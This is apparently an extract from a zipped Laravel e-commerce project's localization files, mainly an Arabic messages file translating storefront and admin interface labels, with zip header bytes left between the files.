:attribute must be at least :min kilobytes.', 'numeric' => 'The :attribute must be at least :min.', 'string' => 'The :attribute must be at least :min characters.', ], 'not_in' => 'The selected :attribute is invalid.', 'not_regex' => 'The :attribute format is invalid.', 'numeric' => 'The :attribute must be a number.', 'password' => 'The password is incorrect.', 'present' => 'The :attribute field must be present.', 'regex' => 'The :attribute format is invalid.', 'required' => 'The :attribute field is required.', 'required_if' => 'The :attribute field is required when :other is :value.', 'required_unless' => 'The :attribute field is required unless :other is in :values.', 'required_with' => 'The :attribute field is required when :values is present.', 'required_without' => 'The :attribute field is required when :values is not present.', 'required_without_all' => 'The :attribute field is required when none of :values are present.', 'required_with_all' => 'The :attribute field is required when :values are present.', 'same' => 'The :attribute and :other must match.', 'size' => [ 'array' => 'The :attribute must contain :size items.', 'file' => 'The :attribute must be :size kilobytes.', 'numeric' => 'The :attribute must be :size.', 'string' => 'The :attribute must be :size characters.', ], 'starts_with' => 'The :attribute must start with one of the following: :values.', 'string' => 'The :attribute must be a string.', 'timezone' => 'The :attribute must be a valid zone.', 'unique' => 'The :attribute has already been taken.', 'uploaded' => 'The :attribute failed to upload.', 'url' => 'The :attribute format is invalid.', 'uuid' => 'The :attribute must be a valid UUID.', ]; PK ! �L��X X sa/pagination.phpnu �[��� <?php return [ 'next' => 'Next »', 'previous' => '« Previous', ]; PK ! ��[� � sa/messages.phpnu �[��� <?php return array ( '24/7_Support_Center' => '24/7 مركز الدعم', '3rd_party' => '3rd الحزب', '4 star' => '4 نجوم', '4 to 6 days' => 'من 4 إلى 6 أيام', '4_to_6_days' => 'من 4 إلى 6 أيام', '5 star' => '5 نجوم', '7 Days Return Policy' => '7 أيام سياسة العودة', '7_Days_Return_Policy' => '7 أيام سياسة العودة', '8+_Character' => '8+ حرف', '8+_characters_required' => '8+ أحرف مطلوبة', 'A-Z' => 'A-Z', 'A/C_No' => 'A/C لا', 'ADD URI' => 'أضف أوري', 'ADDRESSES' => 'عناوين', 'ADD_URI' => 'أضف أوري', 'APP_DEBUG' => 'App Debug', 'APP_MODE' => 'وضع التطبيق', 'APP_NAME' => 'اسم التطبيق', 'APP_URL' => 'APP URL', 'ARRIVALS' => 'الوصول', 'ASE/DESC' => 'ASE/DESC', 'AVC' => 'AVC', 'A_Z' => 'أ', 'A_to_Z' => 'من أ إلى ض', 'A_to_Z_Order' => 'من أجل Z', 'Abc' => 'ABC', 'About Company' => 'عن الشركة', 'About Our Company' => 'بالنسبه لشركتنا', 'About Us' => 'معلومات عنا', 'About_Company' => 'عن الشركة', 'About_Our_Company' => 'بالنسبه لشركتنا', 'About_Us' => 'معلومات عنا', 'About_us' => 'معلومات عنا', 'Accept the reCAPTCHA Terms of Service' => 'قبول شروط الخدمة recaptcha', 'Accept_All_Cookies' => 'قبول جميع ملفات تعريف الارتباط', 'Account' => 'حساب', 'Account Name' => 'إسم الحساب', 'Account No' => 'حساب لا', 'Account _number' => 'رقم حساب', 'Account_Information' => 'معلومات الحساب', 'Account_Number' => 'رقم حساب', 'Accounts' => 'حسابات', 'Action' => 'فعل', 'Activate' => 'تفعيل', 'Active' => 'نشيط', 'Active Product' => 'منتج نشط', 'Active_Products' => 'المنتجات النشطة', 'Add' => 'يضيف', 'Add Help Topic' => 'أضف موضوع المساعدة', 'Add New Currency' => 'أضف عملة جديدة', 'Add Product' => 'أضف منتج', 'Add Shipping' => 'إضافة الشحن', 'Add a ' => 'أضف', 'Add new' => 'اضف جديد', 'Add new delivery-man' => 'إضافة تسليم جديد رجل', 'Add new notification' => 'أضف إشعارًا جديدًا', 'Add new product' => 'أضف منتجًا جديدًا', 'Add_Address' => 'اضف عنوان', 'Add_Domain_(For_ex= _demo.6amtech.com)' => 'إضافة المجال (لـ EX=> DEMO.6amtech.com)', 'Add_Fields' => 'إضافة الحقول', 'Add_New' => 'اضف جديد', 'Add_New_Card' => 'أضف بطاقة جديدة', 'Add_New_Employee' => 'أضف موظفًا جديدًا', 'Add_New_Field' => 'أضف حقلًا جديدًا', 'Add_New_Product' => 'أضف منتجًا جديدًا', 'Add_New_Seller' => 'أضف بائعًا جديدًا', 'Add_Product' => 'أضف منتج', 'Add_a _abel_(Ex= _abc_company)' => 'أضف Abel (على سبيل المثال=> ABC Company)', 'Add_dynamic_url_to_secure_admin_login_access.' => 'أضف عنوان URL الديناميكي لتأمين الوصول إلى تسجيل الدخول.', 'Add_dynamic_url_to_secure_employee_login_access.' => 'أضف عنوان URL الديناميكي لتأمين الوصول إلى تسجيل الدخول إلى الموظفين.', 'Add_fields' => 'إضافة الحقول', 'Add_method' => 'أضف الطريقة', 'Add_new' => 'اضف جديد', 'Add_new_product' => 'أضف منتجًا جديدًا', 'Add_to_cart' => 'أضف إلى السلة', 'Address' => 'عنوان', 'Address Update Successfully' => 'تحديث العنوان بنجاح', 'Address_Type' => 'نوع العنوان', 'Addresses' => 'عناوين', 'Admin' => 'مسؤل', 'Admin Shop Banner' => 'لافتة متجر المشرف', 'Admin | Login' => 'المسؤول | تسجيل الدخول', 'Admin_Commission' => 'لجنة الإدارة', 'Admin_Discount' => 'خصم المسؤول', 'Admin_Earning' => 'كسب المسؤول', 'Admin_Earning_Report' => 'تقرير كسب المشرف', 'Admin_Net_Income' => 'صافي الدخل الإداري', 'Air Conditioner' => 'مكيف هواء', 'All' => 'الجميع', 'All Brands Page' => 'جميع العلامات التجارية صفحة', 'All Categories' => 'جميع الفئات', 'All Category Page' => 'جميع صفحة الفئة', 'All Seller Page' => 'جميع صفحة البائع', 'All input field is required' => 'كل حقل الإدخال مطلوب', 'All input field required' => 'جميع حقل الإدخال المطلوب', 'All_Brand' => 'كل العلامة التجارية', 'All_Brands' => 'جميع العلامات التجارية', 'All_Brands_Page' => 'جميع العلامات التجارية صفحة', 'All_Cart_Product_List' => 'جميع قائمة منتجات العربة', 'All_Categories' => 'جميع الفئات', 'All_Order_List' => 'جميع قائمة الطلبات', 'All_Pages_Banner' => 'جميع الصفحات لافتة', 'All_Pages_Banner ' => 'جميع الصفحات لافتة', 'All_Priority' => 'كل الأولوية', 'All_Product' => 'كل المنتج', 'All_Products' => 'جميع المنتجات', 'All_Seller_Page' => 'جميع صفحة البائع', 'All_Sellers' => 'جميع البائعين', 'All_Shops' => 'جميع المتاجر', 'All_Status' => 'كل الوضع', 'All_Stores' => 'جميع المتاجر', 'All_Wishing_Product_List' => 'كل ما يتمناه قائمة المنتجات', 'All_copy_right_reserved_©_2023_' => 'كل نسخة محفوظة â © 2023', 'All_products' => 'جميع المنتجات', 'Already Withdrawn' => 'تم سحبها بالفعل', 'Already in your wishlist' => 'بالفعل في قائمة أمنياتك', 'Already_Settled' => 'استقر بالفعل', 'Already_Withdrawn' => 'تم سحبها بالفعل', 'Already_have_store' => 'لديك بالفعل متجر', 'Already_have_store ' => 'لديك بالفعل متجر', 'Admin_also_reward_their_top_customers_with_wallet_money' => 'كما يكافئ أمين عملائهم الكبار بأموال محفظة', 'Amount' => 'كمية', 'An' => 'و', 'An_OTP_(One_Time_Password)_has_been_sent_to' => 'تم إرسال OTP (كلمة مرور لمرة واحدة) إلى', 'An_OTP_(One_Time_Password)_has_been_sent_to_your_email' => 'تم إرسال OTP (كلمة مرور لمرة واحدة) إلى بريدك الإلكتروني', 'Analysis' => 'تحليل', 'Analytic_Script' => 'السيناريو التحليلي', 'Analytics' => 'التحليلات', 'Another' => 'آخر', 'Another_Address' => 'عنوان آخر', 'Answer' => 'إجابة', 'App_Logo' => 'شعار التطبيق', 'App_Settings' => 'إعدادات التطبيقات', 'Application' => 'طلب', 'Application System' => 'تطبيق نظام', 'Applications' => 'التطبيقات', 'Apply' => 'يتقدم', 'Apply_Coupon_Code' => 'تطبيق رمز القسيمة', 'Approve' => 'يعتمد', 'Approved' => 'موافقة', 'Are you sure' => 'هل أنت متأكد', 'Are you sure ' => 'هل أنت متأكد', 'Are you sure Change this' => 'هل أنت متأكد من تغيير هذا', 'Are you sure Change this ' => 'هل أنت متأكد من تغيير هذا', 'Are you sure delete this' => 'هل أنت متأكد من حذف هذا', 'Are you sure delete this ' => 'هل أنت متأكد من حذف هذا', 'Are you sure delete this FAQ' => 'هل أنت متأكد من حذف هذه الأسئلة الشائعة', 'Are you sure delete this social media' => 'هل أنت متأكد من حذف وسائل التواصل الاجتماعي هذه', 'Are you sure to delete this' => 'هل أنت متأكد من حذف هذا', 'Are you sure to delete this ' => 'هل أنت متأكد من حذف هذا', 'Are you sure you want to Delete' => 'هل أنت متأكد أنك تريد حذف', 'Are_you_sure' => 'هل أنت متأكد', 'Are_you_sure ' => 'هل أنت متأكد', 'Are_you_sure_delete_this' => 'هل أنت متأكد من حذف هذا', 'Are_you_sure_delete_this_banner' => 'هل أنت متأكد من حذف هذه اللافتة', 'Are_you_sure_delete_this_brand' => 'هل أنت متأكد من حذف هذه العلامة التجارية', 'Are_you_sure_delete_this_role' => 'هل أنت متأكد من حذف هذا الدور', 'Are_you_sure_remove_this_product' => 'هل أنت متأكد من إزالة هذا المنتج', 'Are_you_sure_to_delete_this' => 'هل أنت متأكد من حذف هذا', 'Are_you_sure_to_delete_this ' => 'هل أنت متأكد من حذف هذا', 'Are_you_sure_to_delete_this_sub_category' => 'هل أنت متأكد من حذف هذه الفئة الفرعية', 'Aready_Withdrawn' => 'سحبت AREADY', 'Arkohub' => 'Arkohub', 'Asc/Dsc' => 'ASC/DSC', 'Ask_about_this_product' => 'اسأل عن هذا المنتج', 'Attachment' => 'مرفق', 'Attribute' => 'يصف', 'Attribute_Name' => 'اسم السمة', 'Attribute_Setup' => 'إعداد السمة', 'Attribute_deleted_successfully' => 'تم حذف السمة بنجاح', 'Attributes' => 'صفات', 'Audio' => 'صوتي', 'AuthKey_KeyID.p8' => 'Authkey keyid.p8', 'Authentic_Product' => 'منتج أصيل', 'Authentic_Products' => 'منتجات أصيلة', 'Authentication' => 'المصادقة', 'Authorized redirect URIs' => 'uris إعادة التوجيه المعتمدة', 'Available color' => 'اللون المتاح', 'Available_Color' => 'اللون المتاح', 'Average' => 'متوسط', 'Average Product Value' => 'متوسط قيمة المنتج', 'Average Ratings' => 'متوسط التقييمات', 'Average_Earning_Value' => 'متوسط قيمة الكسب', 'Average_Product_Value' => 'متوسط قيمة المنتج', 'Average_Ratings' => 'متوسط التقييمات', 'Average_Sales_Value' => 'متوسط قيمة المبيعات', 'Axxelus' => 'Axxelus', 'B. Store' => 'متجر', 'B. Technology' => 'ب. التكنولوجيا', 'BUYER_USERNAME' => 'اسم المستخدم المشتري', 'Back' => 'خلف', 'Back to Shipping' => 'العودة إلى الشحن', 'Back_Again' => 'عاد ثانية', 'Back_to_seller_list' => 'العودة إلى قائمة البائع', 'Background Music for commercial use' => 'موسيقى الخلفية للاستخدام التجاري', 'Bags & Shoes' => 'الحقائب والأحذية', 'Bank Info' => 'معلومات البنك', 'Bank Info View' => 'عرض معلومات البنك', 'Bank Information' => 'المعلومات المصرفية', 'Bank Name' => 'اسم البنك', 'Bank info' => 'معلومات البنك', 'Bank_Name' => 'اسم البنك', 'Banner' => 'لافتة', 'Banner About Us' => 'لافتة عنا', 'Banner Cancellation Policy' => 'سياسة إلغاء اللافتة', 'Banner Faq Page' => 'صفحة الأسئلة الشائعة لافتة', 'Banner Privacy Policy' => 'سياسة خصوصية لافتة', 'Banner Refund Policy' => 'سياسة استرداد الراية', 'Banner Return Policy' => 'سياسة عودة لافتة', 'Banner Terms Conditions' => 'شروط الشرق', 'Banner_deleted_successfully' => 'تم حذف لافتة بنجاح', 'Banner_published_successfully' => 'تم نشر Banner بنجاح', 'Banner_unpublished_successfully' => 'لافتة غير منشورة بنجاح', 'Banners' => 'لافتات', 'Base URL of the site ex= ' => 'عنوان URL الأساسي للموقع EX=>', 'Basic' => 'أساسي', 'Bazaar' => 'البازار', 'Be careful before you turn on/off maintenance mode' => 'كن حذرا قبل تشغيل/إيقاف وضع الصيانة', 'Be_the_first_one_to_know_about_discounts' => 'كن أول من يعرف عن الخصومات', 'Beauty Health & Hair' => 'صحة الجمال والشعر', 'Becareful before change the mode' => 'حذر قبل تغيير الوضع', 'Becareful for change the mode' => 'يحذر من تغيير الوضع', 'Become a' => 'اصبح ال', 'Become a Delivery Man' => 'كن رجل توصيل', 'Become_a' => 'اصبح ال', 'Become_a_Delivery_Man' => 'كن رجل توصيل', 'Become_a_Seller' => 'كن بائعًا', 'Before delivered you need to make payment status paid!' => 'قبل تسليمها ، تحتاج إلى دفع حالة الدفع!', 'Below Average' => 'أقل من المتوسط', 'Best_Selling' => 'أفضل مبيعات', 'Best_Sellings' => 'أفضل عمليات البلادات', 'Bicycle Shop' => 'متجر للدراجات', 'Billing_Address' => 'عنوان وصول الفواتير', 'Billing_Section' => 'قسم الفواتير', 'Billing_address' => 'عنوان وصول الفواتير', 'Biography' => 'سيرة شخصية', 'Blog' => 'مدونة', 'Bluetooth Speaker' => 'سماعة بلوتوث', 'Bottom' => 'قاع', 'Branch' => 'فرع', 'Branch_Name' => 'اسم الفرع', 'Brand' => 'ماركة', 'Brand Add' => 'إضافة العلامة التجارية', 'Brand Edit' => 'تحرير العلامة التجارية', 'Brand List' => 'قائمة العلامة التجارية', 'Brand_Logo' => 'شعار العلامة التجارية', 'Brand_Name' => 'اسم العلامة التجارية', 'Brand_deleted_successfully' => 'تم حذف العلامة التجارية بنجاح', 'Brand_update' => 'تحديث العلامة التجارية', 'Brands' => 'العلامات التجارية', 'Business Setup' => 'إعداد الأعمال', 'Business_Section' => 'قسم الأعمال', 'Business_Settings' => 'إعدادات الأعمال', 'Business_Setup' => 'إعداد الأعمال', 'Business_mode' => 'وضع العمل', 'Button_Text' => 'زر كتابة', 'Buy_Now' => 'اشتري الآن', 'By_Review_Rating' => 'عن طريق تصنيف المراجعة', 'By_clicking_sign_up_you_are_agreed_with_our ' => 'من خلال النقر على التسجيل ، تم الاتفاق علىك مع', 'Cable & Converters' => 'الكابل والمحولات', 'Callback URI' => 'رد الاتصال أوري', 'Callback_URI' => 'رد الاتصال أوري', 'Callback_url' => 'عاود الاتصال بالعنوان', 'Camera Accessories' => 'ملحقات الكاميرا', 'Cancel' => 'يلغي', 'Cancel_Order' => 'الغاء الطلب', 'Cancel_order' => 'الغاء الطلب', 'Canceled' => 'ألغيت', 'Canceled_Orders' => 'أوامر إلغاء', 'Cancellation Policy' => 'سياسة الإلغاء', 'Cancellation_Policy' => 'سياسة الإلغاء', 'Cancelled' => 'ألغيت', 'Captcha Failed' => 'فشل CAPTCHA', 'Captcha_Failed.' => 'فشل CAPTCHA.', 'Card' => 'بطاقة', 'Cart' => 'عربة التسوق', 'Cart key or ID is required!' => 'مفتاح العربة أو الهوية مطلوبة!', 'Cart_List' => 'قائمة العربة', 'Cash Payments' => 'التسديد نقذا', 'Cash Payments ' => 'التسديد نقذا', 'Cash_ Payments' => 'التسديد نقذا', 'Cash_On_Delivery' => 'الدفع عند الاستلام', 'Cash_Payment' => 'دفع نقدا', 'Cash_Payments' => 'التسديد نقذا', 'Cash_on_Delivery' => 'الدفع عند الاستلام', 'Categories' => 'فئات', 'Category' => 'فئة', 'Category Logo' => 'شعار الفئة', 'Category deleted Successfully.' => 'تم حذف الفئة بنجاح.', 'Category_Logo' => 'شعار الفئة', 'Category_Name' => 'اسم التصنيف', 'Category_Setup' => 'إعداد الفئة', 'Category_cost_successfully_updated' => 'تحديث تكلفة الفئة بنجاح', 'Category_deleted_Successfully.' => 'تم حذف الفئة بنجاح.', 'Category_tag' => 'علامة الفئة', 'Central Air Conditioner.' => 'مكيف الهواء المركزي.', 'Centre Point' => 'نقطة مركزية', 'Change' => 'يتغير', 'Change status to paid' => 'تغيير الحالة إلى الدفع', 'Charger' => 'شاحن', 'Chat' => 'محادثة', 'Chat with seller' => 'الدردشة مع البائع', 'Chat_with_Delivery_man' => 'الدردشة مع رجل التسليم', 'Chat_with_Seller' => 'الدردشة مع البائع', 'Chat_with_delivery' => 'الدردشة مع التسليم', 'Chat_with_deliveryman' => 'الدردشة مع التسليم', 'Chat_with_seller' => 'الدردشة مع البائع', 'Chatting List' => 'قائمة الدردشة', 'Chatting Page' => 'صفحة الدردشة', 'Chatting_List' => 'قائمة الدردشة', 'Check in ' => 'تحقق في', 'Check_Status' => 'تحقق من حالة', 'Check_in_âAccept_the_reCAPTCHA_Terms_of_Serviceâ' => 'تحقق في  اقبل شروط الخدمة recaptcha', 'Check_now' => 'تأكد الان', 'Checkout' => 'الدفع', 'Choice Title' => 'عنوان الاختيار', 'Choose' => 'يختار', 'Choose Image' => 'اختر صورة', 'Choose Option' => 'إختر خيارا', 'Choose Payment Method' => 'اختر وسيلة الدفع', 'Choose file' => 'اختر ملف', 'Choose_Address_Type' => 'اختر نوع العنوان', 'Choose_Label' => 'اختر التسمية', 'Choose_Logo' => 'اختر الشعار', 'Choose_Option' => 'إختر خيارا', 'City' => 'مدينة', 'Classic' => 'كلاسيكي', 'Classic Sneakers For Men' => 'أحذية رياضية كلاسيكية للرجال', 'Clean' => 'ينظف', 'Clean_Database' => 'قاعدة بيانات نظيفة', 'Clear' => 'واضح', 'Clear_All' => 'امسح الكل', 'Click' => 'انقر', 'Click & Collect' => 'انقر وتجميع', 'Click Continue and Download the file in device named AuthKey_ID.p8 (Store it safely and it is used for push notification)' => 'انقر فوق متابعة وتنزيل الملف في الجهاز المسماة Authkey ID.P8 (قم بتخزينه بأمان ويتم استخدامه لإخطار الدفع)', 'Click Here' => 'انقر هنا', 'Click Plus icon - select App IDs - click on Continue' => 'انقر فوق أيقونة - حدد معرفات التطبيق - انقر فوق متابعة', 'Click to Reset' => 'انقر لإعادة تعيين', 'Click_here' => 'انقر هنا', 'Client' => 'عميل', 'Client ID' => 'معرف العميل', 'Client OAuth Login' => 'العميل OAuth تسجيل الدخول', 'Client Secret' => 'سر العميل', 'Close' => 'يغلق', 'Close sidebar' => 'أغلق الشريط الجانبي', 'Close_Ticket' => 'تغلق تذكرة', 'Close_this_ticket' => 'أغلق هذه التذكرة', 'Close_ticket' => 'تغلق تذكرة', 'Code' => 'شفرة', 'Codecanyon' => 'Codecanyon', 'Color' => 'لون', 'Color_Variant' => 'متغير اللون', 'Colors' => 'الألوان', 'Comic Book' => 'كتاب الشخصيات', 'Comic book pdf' => 'الكتاب الهزلي pdf', 'Comment' => 'تعليق', 'Commission' => 'عمولة', 'Commission Earning' => 'كسب اللجنة', 'Commission Given' => 'العمولة المعطاة', 'Commission_Given' => 'العمولة المعطاة', 'Company Vehicle' => 'مركبة الشركة', 'Company_Copyright_Text' => 'نص حقوق الطبع والنشر للشركة', 'Company_Information' => 'معلومات الشركة', 'Compare' => 'يقارن', 'Compare_List' => 'قارن القائمة', 'Complaint' => 'شكوى', 'Complete Registration' => 'اكمل التسجيل', 'Complete the' => 'أكمل ال', 'Complete the add details form and press' => 'أكمل نموذج التفاصيل إضافة واضغط', 'Completed_Orders' => 'أوامر مكتملة', 'Completion Rate' => 'معدل الانتهاء', 'Computer Office & Security' => 'مكتب الكمبيوتر والأمن', 'Computer & Office' => 'الكمبيوتر والمكتب', 'Computer Ram' => 'كبش كمبيوتر', 'Configuration_updated_successfully' => 'تم تحديث التهيئة بنجاح', 'Configure' => 'تهيئة', 'Configure_your_mail_setup_first' => 'قم بتكوين إعداد البريد الخاص بك أولاً', 'Confirm' => 'يتأكد', 'Confirm Email' => '.تأكيد عنوان البريد الإلكتروني', 'Confirm Password' => 'تأكيد كلمة المرور', 'Confirm your new password' => 'قم بتأكيد كلمة المرور الجديدة الخاصة بك', 'Confirm_Password' => 'تأكيد كلمة المرور', 'Confirmed' => 'مؤكد', 'Connection' => 'اتصال', 'Consumer electronics' => 'مستهلكى الكترونيات', 'Contact' => 'اتصال', 'Contact List' => 'قائمة الإتصال', 'Contact Number' => 'رقم الاتصال', 'Contact Person Name' => 'اسم شخص الاتصال', 'Contact Us' => 'اتصل بنا', 'Contact View' => 'الاتصال عرض', 'Contact info' => 'معلومات الاتصال', 'Contact_Info' => 'معلومات الاتصال', 'Contact_Number' => 'رقم الاتصال', 'Contact_Person' => 'الشخص الذي يمكن الاتصال به', 'Contact_Person_Name' => 'اسم شخص الاتصال', 'Contact_deleted_successfully' => 'تم حذف الاتصال بنجاح', 'Continue' => 'يكمل', 'Continue_Shopping' => 'مواصلة التسوق', 'Convert_to_Currency' => 'تحويل العملة', 'Convert_your_loyalty_point_to_wallet_money.' => 'تحويل نقطة الولاء الخاصة بك إلى محفظة المال.', 'Convert_your_loyalty_points_into_wallet_money' => 'تحويل نقاط الولاء الخاصة بك إلى أموال محفظة', 'Cookie_Settings' => 'إعدادات ملفات تعريف الارتباط', 'Cooking Recipe' => 'وصفة طهي', 'Cooking Recipe Book' => 'كتاب وصفة الطبخ', 'Copied successfully' => 'نسخ بنجاح', 'Copied to the clipboard' => 'نسخ إلى الحافظة', 'Copied_to_the_clipboard' => 'نسخ إلى الحافظة', 'Copy' => 'ينسخ', 'Copy URI' => 'Copyiri', 'Copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save.' => 'نسخ مفتاح الموقع ومعجون المفتاح السري في المدخلات المودعة أدناه وحفظ.', 'Copyright' => 'حقوق النشر', 'Country' => 'دولة', 'Country Fair' => 'معرض البلد', 'Coupon' => 'قسيمة', 'Coupon Add' => 'القسيمة إضافة', 'Coupon Discount' => 'خصم القسيمة', 'Coupon Edit' => 'قسيمة تحرير', 'Coupon code' => 'رمز الكوبون', 'Coupon_Discount' => 'خصم القسيمة', 'Coupon_Discount_Amount' => 'مبلغ خصم القسيمة', 'Coupon_added_successfully' => 'وأضاف القسيمة بنجاح', 'Coupon_discount' => 'خصم القسيمة', 'Coupon_status_updated' => 'تم تحديث حالة القسيمة', 'Coupon_updated_successfully' => 'قسيمة تم تحديثها بنجاح', 'Crave' => 'يريد بشدة', 'Create' => 'يخلق', 'Create App' => 'إنشاء التطبيق', 'Create Role' => 'إنشاء دور', 'Create credentials' => 'إنشاء بيانات الاعتماد', 'Create_your_own_business' => 'إنشاء عملك الخاص', 'Create_your_own_store.' => 'قم بإنشاء متجرك الخاص.', 'Credential Setup' => 'إعداد الاعتماد', 'Credentials SetUp' => 'إعداد بيانات الاعتماد', 'Credentials_SetUp_page' => 'بيانات إعداد بيانات الاعتماد', 'Credit' => 'ائتمان', 'Credit / Debit card ( Stripe )' => 'بطاقة الائتمان / الخصم (شريط)', 'Currency' => 'عملة', 'Currency Code' => 'رمز العملة', 'Currency Name' => 'اسم العملة', 'Currency Symbol' => 'رمز العملة', 'Currency Symbol Position' => 'موقف رمز العملة', 'Currency changed to' => 'تغيرت العملة إلى', 'Currency removed successfully!' => 'تمت إزالة العملة بنجاح!', 'Currency status successfully changed.' => 'تغيرت حالة العملة بنجاح.', 'Currency updated successfully!' => 'تم تحديث العملة بنجاح!', 'Currency_Setup' => 'إعداد العملة', 'Current Stock' => 'الأسهم الحالية', 'Current Stock Amount' => 'مبلغ المخزون الحالي', 'Current_Stock' => 'الأسهم الحالية', 'Current_Stock_Amount' => 'مبلغ المخزون الحالي', 'Custom Date' => 'موعد مخصص', 'Custom_Date' => 'موعد مخصص', 'Customeer_Added_Successfully' => 'وأضاف Customeer بنجاح', 'Customer' => 'عميل', 'Customer Details' => 'تفاصيل العميل', 'Customer ID' => 'هوية الزبون', 'Customer List' => 'قائمة العملاء', 'Customer Message' => 'رسالة العميل', 'Customer Name' => 'اسم الزبون', 'Customer details' => 'تفاصيل العميل', 'Customer_Info' => 'معلومات العميل', 'Customer_List' => 'قائمة العملاء', 'Customer_Name' => 'اسم الزبون', 'Customer_Verify' => 'يتحقق العميل', 'Customer_information' => 'معلومات العميل', 'Customer_list' => 'قائمة العملاء', 'Customer_not_found' => 'لم يتم العثور على العميل', 'Customer_not_found_or_Account_has_been_suspended' => 'لم يتم العثور على العميل أو تم تعليق الحساب', 'Customer_review' => 'رأي العميل', 'Customers' => 'عملاء', 'Customers_will_not_be_able_to_order_or_purchase_from_his_shop' => 'لن يتمكن العملاء من الطلب أو الشراء من متجره', 'DB_CONNECTION' => 'اتصال DB', 'DB_DATABASE' => 'قاعدة بيانات DB', 'DB_HOST' => 'مضيف DB', 'DB_PASSWORD' => 'كلمة مرور DB', 'DB_PORT' => 'منفذ DB', 'DB_USERNAME' => 'اسم المستخدم DB', 'DB_clean' => 'ديسيبل نظيفة', 'DB_connection' => 'اتصال DB', 'DB_database' => 'قاعدة بيانات DB', 'DB_host' => 'مضيف DB', 'DB_password' => 'كلمة مرور DB', 'DB_port' => 'منفذ DB', 'DB_username' => 'اسم المستخدم DB', 'DELIVERY' => 'توصيل', 'DESC' => 'DESC', 'Dashboard' => 'لوحة القيادة', 'Data_updated_successfully!' => 'تم تحديث البيانات بنجاح!', 'Date' => 'تاريخ', 'Date Submitted' => 'تاريخ التقديم', 'Days' => 'أيام', 'Deal Of The Day' => 'صفقة اليوم', 'Deal Page' => 'صفحة الصفقة', 'Deal Product' => 'صفقة المنتج', 'Deal Update' => 'تحديث الصفقة', 'Deal of the Day' => 'صفقة اليوم', 'Deal of the day form' => 'صفقة اليوم', 'Debit' => 'دَين', 'Default' => 'تقصير', 'Default Sales Commission' => 'لجنة المبيعات الافتراضية', 'Default_Method_updated_failed.' => 'فشل تحديث الطريقة الافتراضية.', 'Default_Method_updated_successfully' => 'تم تحديث الطريقة الافتراضية بنجاح', 'Delete' => 'يمسح', 'Delete_My_Account' => 'احذف حسابي', 'Delivered' => 'تم التوصيل', 'Delivered_By' => 'سلمت بواسطة', 'Delivered_Orders' => 'أوامر تسليم', 'Delivery' => 'توصيل', 'Delivery status updated to' => 'تم تحديث حالة التسليم إلى', 'Delivery-Man' => 'رجل التوصيل', 'Delivery-man removed!' => 'تلاشي مان إزالته!', 'Delivery_Address' => 'عنوان التسليم', 'Delivery_Charge' => 'رسوم التوصيل', 'Delivery_Information_Details' => 'تفاصيل معلومات التسليم', 'Delivery_Man' => 'رجل التوصيل', 'Delivery_Man_Info' => 'معلومات رجل التسليم', 'Delivery_Restriction' => 'تقييد التسليم', 'Delivery_man' => 'رجل التوصيل', 'Delivery_unavailable_for_this_country' => 'التسليم غير متاح لهذا البلد', 'Delivery_unavailable_for_this_zip_code_area' => 'التسليم غير متوفر لهذه منطقة الرمز البريدي', 'Delivery_unavailable_in_this_country' => 'التسليم غير متاح في هذا البلد', 'Deliveryman List' => 'قائمة التوصيل', 'Deliveryman_Review' => 'مراجعة التوصيل', 'Deluxe Online' => 'ديلوكس على الانترنت', 'Deluxe Online Deluxe' => 'Deluxe Online Deluxe', 'Deluxe Online Deluxe Online' => 'Deluxe Online Deluxe Online', 'Denied' => 'رفض', 'Deny' => 'ينكر', 'Description' => 'وصف', 'Details' => 'تفاصيل', 'Dev' => 'ديف', 'Digi Tech' => 'Digi Tech', 'Digital Files' => 'الملفات الرقمية', 'Digital Payments' => 'المدفوعات الرقمية', 'Digital Product' => 'المنتج الرقمي', 'Digital Product House' => 'دار المنتجات الرقمية', 'Digital Product on/off' => 'المنتج الرقمي تشغيل/إيقاف', 'Digital Seller' => 'البائع الرقمي', 'Digital Spot' => 'بقعة رقمية', 'Digital Technology' => 'التقنية الرقمية', 'Digital Watches' => 'الساعات الرقمية', 'Digital_Payment' => 'الدفع الرقمي', 'Digital_Payments' => 'المدفوعات الرقمية', 'Discount' => 'تخفيض', 'Discount Given' => 'خصم', 'Discount can not be more or equal to the price!' => 'لا يمكن أن يكون الخصم أكثر أو يساوي السعر!', 'Discount on Purchase' => 'خصم على الشراء', 'Discount_Amount' => 'مقدار الخصم', 'Discount_Given' => 'خصم', 'Discount_Type' => 'نوع الخصم', 'Discount_on_Purchase' => 'خصم على الشراء', 'Discount_on_product' => 'خصم على المنتج', 'Discounted_Amount' => 'مبلغ مخفض', 'Discounted_Products' => 'منتجات مخفضة', 'Do you want to delete this ' => 'هل تريد حذف هذا', 'Do you want to logout' => 'هل ترغب بالخروج', 'Do_not_Logout' => 'لا تندمج', 'Do_not_Miss_Todays_Deal' => 'لا تفوت صفقة اليوم', 'Do_not_delete' => 'لا تحذف', 'Do_you_want_to_logout' => 'هل ترغب بالخروج', 'Doe' => 'ظبية', 'Don t Delete' => 'لا حذف', 'Don`t_have_the_template_ ' => 'ليس لديك القالب', 'Donât_Miss_Todays_Deal' => 'لا تفوت صفقة اليوم', 'Donât_Miss_the_Chance' => 'لا تفوت الفرصة', 'Donât_have_account' => 'ليس لديك حساب', 'Double Fan' => 'مروحة مزدوجة', 'Download' => 'تحميل', 'Download Format' => 'تنزيل تنسيق', 'Download Generate Sitemap' => 'تنزيل إنشاء خريطة sitemap', 'Download PDF' => 'تحميل PDF', 'Download the file in device named' => 'قم بتنزيل الملف في الجهاز المسمى', 'Download the format file and fill it with proper data' => 'قم بتنزيل ملف التنسيق واملأه بالبيانات المناسبة', 'Download the format file and fill it with proper data.' => 'قم بتنزيل ملف التنسيق واملأه بالبيانات المناسبة.', 'Dress' => 'فستان', 'Driver' => 'سائق', 'Due_Amount' => 'مبلغ مستحق', 'Duration' => 'مدة', 'Dynamova' => 'Dynamova', 'E- tech' => 'التكنولوجيا الإلكترونية', 'EGP_currency_is_required' => 'مطلوب عملة EGP', 'EX' => 'السابق', 'EX of SMS provider s template = your OTP is XXXX here please check' => 'على سبيل المثال من قالب SMS Provider S=> OTP الخاص بك هو xxxx هنا يرجى التحقق', 'EX= 123' => 'على سبيل المثال=> 123', 'EX_of_SMS_providers_template_= _your_OTP_is_XXXX_here_please_check' => 'قالب Ex of SMS Providers=> OTP الخاص بك هو xxxx هنا يرجى التحقق', 'Earn From Order' => 'كسب من الطلب', 'Earn From Shipping' => 'كسب من الشحن', 'Earn_From_Order' => 'كسب من الطلب', 'Earn_From_Shipping' => 'كسب من الشحن', 